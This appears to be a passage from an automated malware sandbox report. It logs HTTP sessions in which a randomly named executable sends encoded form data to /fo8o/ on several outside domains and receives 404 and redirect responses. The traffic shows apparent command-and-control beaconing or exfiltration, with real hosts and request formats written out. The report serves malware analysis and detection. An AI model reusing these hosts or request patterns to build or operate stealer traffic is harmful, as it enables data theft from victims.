Data Raw: 55 36 59 44 73 78 57 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 74 51 73 78 4d 55 75 37 7a 58 46 6b 71 50 76 37 42 44 50 73 32 31 61 64 53 4f 32 35 32 66 72 47 63 45 4c 57 46 53 66 35 61 59 71 77 3d 3d
Data Ascii: U6YDsxW=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVtQsxMUu7zXFkqPv7BDPs21adSO252frGcELWFSf5aYqw==
Dec 2, 2024 14:33:45.638147116 CET | 637 | IN | HTTP/1.1 404 Not Found
Date: Mon, 02 Dec 2024 13:33:45 GMT
Server: Apache
Content-Length: 493
Connection: close
Content-Type: text/html
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 50026 | 66.29.149.46 | 80 | 6392 | C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:33:47.059653997 CET | 1826 | OUT | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.techchains.info
Origin: http://www.techchains.info
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1248
Referer: http://www.techchains.info/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Data Raw: 55 36 59 44 73 78 57 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 59 57 44 7a 38 46 78 30 5a 31 79 31 4d 79 36 68 4d 2f 74 4e 50 62 42 6b 57 4b 67 36 6b 30 57 39 43 68 53 39 58 52 2b 37 33 2f 71 56 59 78 49 79 30 52 52 4d 7a 73 32 41 2b 4f 70 6a 76 75 49 4d 42 4c 6f 72 56 6b 36 6f 46 50 36 58 70 72 6d 36 76 4c 47 41 37 30 34 44 55 69 68 38 49 33 67 74 6f 6b 32 42 34 6b 32 2b 74 4d 6e 77 59 73 75 2b 63 50 71 48 46 67 57 37 55 4a 4c 63 46 50 73 32 4a 52 65 73 48 2f 41 6f 64 63 65 67 61 43 4e 37 68 68 6f 75 43 35 5a 70 4a 45 73 48 45 69 58 37 [TRUNCATED]
Data Ascii: U6YDsxW=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 [TRUNCATED]
Dec 2, 2024 14:33:48.333792925 CET | 637 | IN | HTTP/1.1 404 Not Found
Date: Mon, 02 Dec 2024 13:33:48 GMT
Server: Apache
Content-Length: 493
Connection: close
Content-Type: text/html
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 50027 | 66.29.149.46 | 80 | 6392 | C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:33:49.715419054 CET | 526 | OUT | GET /fo8o/?U6YDsxW=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5haoQH1WjEWithRFLxLKOV4ce9fWCCnKIVX4jHNmrNLQZpWctVBLU=&cPm=bL-XkPyPkF HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Host: www.techchains.info
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 2, 2024 14:33:50.947177887 CET | 652 | IN | HTTP/1.1 404 Not Found
Date: Mon, 02 Dec 2024 13:33:50 GMT
Server: Apache
Content-Length: 493
Connection: close
Content-Type: text/html; charset=utf-8
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 50030 | 195.110.124.133 | 80 | 6392 | C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:33:57.091831923 CET | 807 | OUT | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.elettrosistemista.zip
Origin: http://www.elettrosistemista.zip
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 212
Referer: http://www.elettrosistemista.zip/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Data Raw: 55 36 59 44 73 78 57 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 69 31 55 77 34 49 32 58 75 43 48 37 6d 35 73 61 4e 51 5a 43 68 4c 45 2b 49 67 42 52 2f 6d 6a 2f 4a 7a 78 62 66 34 49 6f 66 65 4f
Data Ascii: U6YDsxW=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCii1Uw4I2XuCH7m5saNQZChLE+IgBR/mj/Jzxbf4IofeO
Dec 2, 2024 14:33:58.445168972 CET | 367 | IN | HTTP/1.1 404 Not Found
Date: Mon, 02 Dec 2024 13:33:58 GMT
Server: Apache
Content-Length: 203
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 50031 | 195.110.124.133 | 80 | 6392 | C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:33:59.747895002 CET | 831 | OUT | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.elettrosistemista.zip
Origin: http://www.elettrosistemista.zip
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 236
Referer: http://www.elettrosistemista.zip/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Data Raw: 55 36 59 44 73 78 57 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 72 47 2b 4b 34 7a 52 66 6d 4a 39 4a 4c 78 4a 49 30 76 6e 72 37 74 6d 63 54 68 61 35 54 4d 6d 2f 61 58 70 78 52 76 58 56 35 58 67 67 3d 3d
Data Ascii: U6YDsxW=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6QxrG+K4zRfmJ9JLxJI0vnr7tmcTha5TMm/aXpxRvXV5Xgg==
Dec 2, 2024 14:34:01.055336952 CET | 367 | IN | HTTP/1.1 404 Not Found
Date: Mon, 02 Dec 2024 13:34:00 GMT
Server: Apache
Content-Length: 203
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      19192.168.2.650032195.110.124.133806392C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 2, 2024 14:34:02.403425932 CET1844OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.elettrosistemista.zip
                                                                                      Origin: http://www.elettrosistemista.zip
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1248
                                                                                      Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 71 5a 30 32 56 74 57 4b 45 6d 4a 69 66 2f 6c 61 30 52 55 6f 71 73 39 59 75 50 4b 61 30 34 35 6f 58 44 76 4a 72 39 54 6f 4b 68 32 75 48 2b 75 48 5a 35 5a 30 73 63 30 74 4a 6f 45 30 54 52 4e 30 57 76 70 65 68 41 6a 6e 6c 71 37 46 73 4f 59 46 71 62 54 36 47 39 65 70 54 43 41 32 44 30 2b 48 4f 52 30 2f 61 35 73 62 33 65 54 58 39 46 58 6d 53 30 46 41 37 63 52 76 47 69 43 72 6e 69 79 61 79 78 6a 59 54 77 75 42 64 6d 69 42 56 62 6c 74 6d 7a 6b 6f 59 76 2f 6b 74 6a 34 2b 54 42 6a 65 [TRUNCATED]
Data Ascii: U6YDsxW= [TRUNCATED]
Dec 2, 2024 14:34:03.911516905 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 02 Dec 2024 13:34:03 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


Session ID: 20
Source IP: 192.168.2.6
Source Port: 50033
Destination IP: 195.110.124.133
Destination Port: 80
PID: 6392
Process: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:34:05.060287952 CET | 532 | OUT | GET /fo8o/?cPm=bL-XkPyPkF&U6YDsxW=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk= HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.elettrosistemista.zip
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 2, 2024 14:34:06.413804054 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 02 Dec 2024 13:34:06 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


Session ID: 21
Source IP: 192.168.2.6
Source Port: 50035
Destination IP: 217.196.55.202
Destination Port: 80
PID: 6392
Process: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:34:28.844506979 CET | 795 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.empowermedeco.com
                                                                                      Origin: http://www.empowermedeco.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 212
                                                                                      Referer: http://www.empowermedeco.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 38 31 6e 69 65 69 33 71 4c 44 64 43 47 51 39 4a 6a 50 7a 58 78 74 43 69 79 75 77 63 71 4c 41 38 34 43 6e 30 58 4c 33 30 77 61 6f
                                                                                      Data Ascii: U6YDsxW=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0Ju81niei3qLDdCGQ9JjPzXxtCiyuwcqLA84Cn0XL30wao
Dec 2, 2024 14:34:30.103638887 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 795
                                                                                      date: Mon, 02 Dec 2024 13:34:29 GMT
                                                                                      server: LiteSpeed
                                                                                      location: https://www.empowermedeco.com/fo8o/
